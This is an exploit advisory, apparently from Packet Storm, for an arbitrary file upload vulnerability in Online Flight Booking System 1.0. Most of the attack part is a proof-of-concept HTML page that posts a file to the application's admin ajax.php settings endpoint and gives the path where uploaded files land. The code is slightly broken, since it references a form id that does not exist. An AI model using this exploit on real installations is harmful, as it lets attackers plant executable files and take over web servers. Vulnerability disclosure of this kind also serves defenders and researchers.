Headline

Online Flight Booking System 1.0 Arbitrary File Upload

Online Flight Booking System version 1.0 suffers from an arbitrary file upload vulnerability.

1 year ago

#vulnerability #windows #php #auth #firefox

=============================================================================================================================================================================
| # Title : Online Flight Booking System 1.0 Remot File Upload vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.campcodes.com/downloads/online-flight-booking-management-system-source-code/?wpdmdl=5913&refresh=66bbf742d7abc1723594562 |
=============================================================================================================================================================================

[+] POC :

[+] The following html code uploads a executable malicious file remotely .

[+] Line 28 : Set your Target.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>RFU</title>
</head>
<body>

    <div class="form-group">  
  <label for="" class="control-label">Avatar</label>  
  <div class="custom-file">  
          <input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">  
          <label class="custom-file-label" for="customFile">Choose file</label>  
        </div>  
</div>

    <input type="button" value="Save User" onclick="saveUser()">  
</form>

<script>  
    function saveUser() {  
        var form = document.getElementById('userForm');  
        var formData = new FormData(form);

        var xhr = new XMLHttpRequest();  
        xhr.open("POST", "http://127.0.0.1/Online_Flight_Booking_Management_System/admin/ajax.php?action=save_settings", true);

        xhr.onload = function () {  
            if (xhr.status === 200) {  
                alert('User saved successfully');  
            } else {  
                alert('An error occurred while saving the user');  
            }  
        };

        xhr.send(formData);  
    }  
</script>

</body>
</html>

[+] Path : http://127.0.0.1/Online_Flight_Booking_Management_System/assets/img

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution

11 months ago

Packet Storm

Fortinet FortiManager Unauthenticated Remote Code Execution

11 months ago

Packet Storm

Asterisk AMI Originate Authenticated Remote Code Execution

11 months ago

Packet Storm

Debian Security Advisory 5823-1

11 months ago

Packet Storm

Debian Security Advisory 5815-2

11 months ago

Packet Storm